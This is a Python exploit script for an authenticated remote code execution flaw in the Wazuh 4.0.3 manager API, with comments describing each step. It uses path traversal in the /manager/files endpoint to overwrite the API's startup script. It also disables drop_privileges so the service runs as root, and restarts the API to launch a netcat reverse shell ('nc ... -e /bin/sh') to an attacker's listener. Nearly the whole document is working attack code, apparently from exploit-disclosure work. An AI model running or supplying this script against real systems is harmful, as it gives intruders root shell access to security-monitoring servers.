# Exploit Title: Wazuh 4.0.3 API RCE
# Author: WickdDavid (Davide Meacci)
# Date: 2021-01-01
# Vendor Homepage: https://github.com/wazuh/wazuh
# Version : 4.0.3
import requests
import sys
import argparse
import time
import json
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
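# Per-request timeouts so a hung connection raises instead of blocking the
# script forever. The restart endpoint is called with wait_for_complete=true,
# so it gets a longer budget than ordinary calls.
REQUEST_TIMEOUT = 30
RESTART_TIMEOUT = 300
# Number of 5-second /manager/status polls to make before giving up on a restart.
MAX_STATUS_POLLS = 60
# Script the API service runs on start; step 6 overwrites it with the payload.
FILE_TO_OVERWRITE = "/var/ossec/api/scripts/wazuh-apid.py"
# Prefix that walks out of the directory /manager/files is meant to stay inside.
PATH_TRAVERSAL = "etc/lists/../../../../.."
# Local copy of the overwritten file, written before anything is changed.
BACKUP_FILE = "backup.py"


def parse_args(argv=None):
    """Parse the command line; argv=None reads sys.argv like the original script.

    All original flags are unchanged. -cacert is new and optional: without it
    TLS verification stays disabled (verify=False), which means the API
    password and the bearer token are exposed to anyone on the path to the
    target.
    """
    parser = argparse.ArgumentParser(description='Wazuh-manager authenticated RCE by WickdDavid')
    parser.add_argument('-user', dest='username', required=True,
                        help='wazuh API username')
    parser.add_argument('-pwd', dest='password', required=True,
                        help='wazuh API password')
    parser.add_argument('-lip', dest='srcip', required=True,
                        help='listening server')
    parser.add_argument('-lport', dest='srcport', required=True,
                        help='listening port')
    parser.add_argument('-tip', dest='destip', required=True,
                        help='target server ip (wazuh API)')
    parser.add_argument('-tport', dest='destport', required=True,
                        help='target server port (wazuh API)')
    parser.add_argument('-cacert', dest='cacert', default=None,
                        help='CA bundle used to verify the API certificate (default: no verification)')
    return parser.parse_args(argv)


def build_exec_payload(srcip, srcport):
    """Return the Python source that replaces wazuh-apid.py (see step 6).

    It is executed by the API service on its next start and runs a reverse
    shell to srcip:srcport. `nc -e` needs a netcat build that supports -e
    (traditional nc, ncat); OpenBSD nc does not, so adjust the command for
    the target if the shell never arrives. Edit this function to change the
    executed payload.
    """
    return """
import os #:l
os.system("nc %s %s -e /bin/sh") #:l
""" % (srcip, srcport)


def restart_pending(status):
    """True while a decoded /manager/status body still carries a "Bad request" title.

    The check is case-insensitive on purpose: the original loop compared the
    literal "Bad request" against a sentinel spelled "Bad Request", so the
    poll never ran and the script relied on wait_for_complete=true alone.
    Anything that is not a dict with a string title counts as "not pending".
    """
    if not isinstance(status, dict):
        return False
    title = status.get("title")
    return isinstance(title, str) and "bad request" in title.lower()


def restart_api(target, headers, verify):
    """PUT /manager/restart, then poll /manager/status until the API answers again.

    Returns True once the status body no longer reports "Bad request", False
    after MAX_STATUS_POLLS polls. A connection that drops while the service
    restarts itself is not fatal here; the poll decides whether it came back.
    """
    try:
        requests.put("%s/manager/restart?wait_for_complete=true" % target,
                     headers=headers, verify=verify, timeout=RESTART_TIMEOUT)
    except requests.RequestException as exc:
        print("[*] Restart request did not complete cleanly (%s); polling status" % exc.__class__.__name__)
    for _ in range(MAX_STATUS_POLLS):
        time.sleep(5)
        try:
            r = requests.get("%s/manager/status" % target, headers=headers,
                             verify=verify, timeout=REQUEST_TIMEOUT)
            status = json.loads(r.text)
        except (requests.RequestException, ValueError):
            # Service still down, or answered with something that is not JSON.
            continue
        if not restart_pending(status):
            return True
    return False


def main():
    """Run the chain: authenticate, back up, elevate, overwrite, restart.

    Exits with status 1 at the first step that fails, and refuses to overwrite
    the API entry script unless a local backup was written first. Proxying
    is left to the HTTPS_PROXY environment variable, which requests honours;
    the original script built a proxies dict but never passed it.
    """
    args = parse_args()
    verify = args.cacert if args.cacert else False
    target = "https://%s:%s" % (args.destip, args.destport)
    exec_payload = build_exec_payload(args.srcip, args.srcport)

    # step 1 - obtaining auth token
    r = requests.get("%s/security/user/authenticate?raw=true" % target,
                     auth=(args.username, args.password), verify=verify,
                     timeout=REQUEST_TIMEOUT)
    if r.status_code != 200:
        print("[!] No auth code recovered. Check username and password")
        sys.exit(1)
    headers = {"Authorization": "Bearer %s" % r.text}

    # step 2 - Privilege Escalation on API (not implemented)

    # step 3 - Save files to be restored later
    print("[+] Saving files to restore later...")
    r = requests.get("%s/manager/files?path=%s%s" % (target, PATH_TRAVERSAL, FILE_TO_OVERWRITE),
                     headers=headers, verify=verify, timeout=REQUEST_TIMEOUT)
    try:
        contents = json.loads(r.text)["contents"]
    except (ValueError, KeyError, TypeError):
        contents = None
    # Never clobber the API entry point without a copy that can be put back.
    if not r.ok or not isinstance(contents, str):
        print("[!] Could not read %s (HTTP %s); aborting before anything is changed"
              % (FILE_TO_OVERWRITE, r.status_code))
        sys.exit(1)
    with open(BACKUP_FILE, "w") as backup:
        backup.write(contents)
    time.sleep(1)

    # step 4 - Local Privilege Escalation: make the API service keep root.
    # This setting persists in the API config and is not reverted by this script.
    print("[+] Changing API config to run as root...")
    r = requests.put("%s/manager/api/config" % target, headers=headers,
                     json={"drop_privileges": False}, verify=verify,
                     timeout=REQUEST_TIMEOUT)
    if not r.ok:
        print("[!] Config change rejected (HTTP %s): %s" % (r.status_code, r.text))
        sys.exit(1)
    time.sleep(1)

    # step 5 - Restart server (now api service runs as root)
    print("[+] Restarting server...")
    if not restart_api(target, headers, verify):
        print("[!] API did not come back after the restart; aborting (drop_privileges was already changed, revert it)")
        sys.exit(1)

    # step 6 - Overwrite /var/ossec/api/scripts/wazuh-apid.py with malicious python payload
    print("[+] Uploading payload...")
    r = requests.put("%s/manager/files?path=%s%s&overwrite=true" % (target, PATH_TRAVERSAL, FILE_TO_OVERWRITE),
                     headers=headers, data=exec_payload, verify=verify,
                     timeout=REQUEST_TIMEOUT)
    if not r.ok:
        print("[!] Payload upload rejected (HTTP %s): %s" % (r.status_code, r.text))
        sys.exit(1)
    time.sleep(1)

    # step 7 - Restart server (now malicious payload will be run by the server)
    # The entry script is now the payload, so presumably the API does not serve
    # /manager/status again; send the restart and do not poll for it. A short
    # timeout keeps a restart that never "completes" from stalling the script.
    print("[+] Restarting API service for the last time...")
    try:
        requests.put("%s/manager/restart?wait_for_complete=true" % target,
                     headers=headers, verify=verify, timeout=REQUEST_TIMEOUT)
    except requests.RequestException as exc:
        print("[*] Restart request ended with %s (expected once the payload replaces the API)"
              % exc.__class__.__name__)
    print("[+] Payload executed, check your shell now.")
    print("[+] Remember to restore changed file (check local backup file)")
    print("[+] Also set drop_privileges back to true in the API config; this script does not revert it")


if __name__ == "__main__":
    main()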